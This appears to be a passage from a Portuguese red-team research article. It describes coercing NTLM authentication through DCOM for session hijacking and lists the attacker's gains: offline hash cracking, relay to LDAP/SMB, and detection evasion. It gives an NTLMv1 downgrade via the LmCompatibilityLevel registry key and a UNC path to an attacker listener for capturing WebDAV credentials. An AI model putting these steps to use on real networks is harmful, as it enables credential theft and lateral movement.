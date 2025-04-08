Agora que sabemos que é possível converter um objeto DCOM em uma ferramenta de sequestro de sessão, a próxima etapa é identificar quais métodos e propriedades podem ser aproveitados para concluir o sequestro. Para esta pesquisa, verifiquei se o comprometimento do usuário poderia ser obtido sem executar uma carga útil, adotando uma abordagem diferente da maioria das técnicas públicas de movimento lateral do DCOM.

Meu objetivo era alcançar resultados comparáveis em um formato "sem arquivos", ou seja, sem a necessidade de transferir ou executar uma carga útil no sistema de destino. Essa distinção é importante porque transferir e executar cargas úteis em um sistema de destino geralmente é considerado uma ação “cara” nas operações de red team. Ao evitar essa etapa, o risco de acionar controles de segurança comuns é significativamente reduzido. Portanto, meu objetivo era comprometer contas de usuários remotos forçando uma autenticação NTLM via DCOM.

Existem diversos benefícios em forçar autenticações NTLM em vez de executar técnicas tradicionais de movimento lateral:

Capture hashes NTLMv1/NTLMv2 e tente quebrá-los offline

Retransmita hashes NTLMv1 ou WebDAV NTLMv2 para outros serviços de rede, como LDAP ou SMB, para executar ações como o usuário afetado

Evite transferir e executar uma carga útil no sistema de destino, o que normalmente atrai mais atenção das ferramentas de segurança

Evite tocar no processo LSASS, reduzindo assim os riscos de detecção

No momento em que este artigo foi escrito, a assinatura LDAP e a vinculação de canais não eram necessárias e aplicadas por padrão na maioria dos controladores de domínio. Essas funcionalidades de segurança são obrigatórias apenas no Windows Server 2025. Isso significa que, se pudermos forçar uma autenticação NTLMv1 ou WebDAV do sistema de destino, podemos retransmiti-la para o LDAP e executar ações como o usuário afetado. Da mesma forma, a assinatura SMB não é exigida por padrão nos servidores Windows, exceto para controladores de domínio.

Outro fator importante a considerar é que os hashes NTLMv1 podem ser facilmente quebrados usando tabelas rainbow, que foram compartilhadas publicamente por Nic Losby, em dezembro de 2024. Essas tabelas reduzem drasticamente o tempo e o esforço necessários para recuperar as credenciais NTLM dos hashes NTLMv1. Para obter um hash NTLMv1 em vez de um hash NTLMv2, modificamos a seguinte chave de registro no sistema de destino:

HKLM\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel

A configuração de LmCompatibilityLevel em um valor igual ou inferior a 2 força o sistema a usar NTLMv1 para autenticação. Essa modificação é possível com privilégios de administrador local e é comumente chamada de "ataque de downgrade NetNTLMv1".

Como alternativa, podemos capturar uma autenticação WebDAV e retransmiti-la para o LDAP, já que as autenticações baseadas em HTTP podem ser encaminhadas para esse serviço. Caso o serviço WebClient ainda não esteja em execução com acesso privilegiado, podemos habilitá-lo remotamente no sistema de destino. Uma vez habilitado, podemos forçar uma autenticação WebDAV NTLM para nosso listener especificando o nome NetBIOS da máquina no caminho UNC. Por exemplo:

\\MYHACKERBOX@80\giveme\creds.txt

Para obter mais informações sobre ataques de retransmissão NTLM e os protocolos que podem ser retransmitidos para diferentes endpoints, consulte o seguinte recurso aqui.